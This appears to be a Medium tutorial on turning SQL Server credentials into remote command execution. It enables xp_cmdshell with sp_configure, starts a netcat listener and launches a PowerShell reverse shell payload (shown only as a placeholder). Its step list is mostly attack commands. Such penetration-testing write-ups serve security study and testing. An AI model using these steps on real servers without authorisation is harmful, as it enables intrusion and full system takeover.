SQL Server — xp_cmdshell to RCE

Basic Information

Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications — which may run either on the same computer or on another computer across a network (including the Internet). From Wikipedia.

Applies to: SQL Server (all supported versions)

Default port: 1433

What is xp_cmdshell?

xp_cmdshell is an extended stored procedure provided by Microsoft and stored in the master database. This procedure allows you to issue operating system commands directly to the Windows command shell via T-SQL code. It is dangerous as trojans and worms can use it to access the system.

Extended stored procedures are stored procedures that call functions from DLL files.

Requirement

Microsoft SQL Server Credentials
- username and password ex. sa:123456

Step to Attack

  1. First, We are using sqsh for getting database shell by command following below.
sqsh -S <IP> -U <Username> -P <Password>

2. Config to enable show advanced options and enable xp_cmdshell by command following below.

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
go
xp_cmdshell 'whoami';
go

3. Using netcat for listening for TCP connections on port 443.

nc -lnvp 443

4. Generate PowerShell reverse shell payload from www.revshells.com.

5. Run xp_cmdshell with the payload and run the go command.

xp_cmdshell '<payload>'; go

6. We’ll get the system shell.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store